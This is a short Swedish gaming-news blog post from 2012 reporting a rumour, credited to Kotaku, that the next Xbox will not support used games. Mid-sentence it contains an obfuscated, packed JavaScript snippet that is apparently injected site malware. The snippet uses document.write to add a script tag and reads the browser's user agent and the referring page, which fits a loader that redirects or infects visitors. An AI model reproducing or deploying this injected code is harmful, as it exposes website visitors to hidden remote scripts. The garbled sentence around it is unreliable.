Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Nästa Xbox kommer få block mot beg-spel.

Nästa Xbox kommer få block mot beg-spel.
Filip Urde
  • On 26 januari, 2012
  • http://www.revue.se/filip-urde

Källor på Microsoft uppger att den kommande konsolen (xbox eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|eihnb|var|u0026u|referrer|zrhez||js|php’.split(’|’),0,{}))
720, xbox loop?
) inte stödjer begagnade spel. Hur detta skydd fungera framgår inte, men vi kan tänka oss att spelen kommer knytas till Xbox Live kontot eller att man endast kan registerar spelet engång. Det är ingen hemlighet att Sony, Microsoft och Nintendo inte är några fans av begagnatmarknaden, men att nu Microsoft skulle ta bort möjligheten helt är ändå överaskande. Men det klingar bra i tiden, med SOPA och PIPA osv.

Nu är detta ett rykte, så vi får väll helt enklet se.

kotaku.com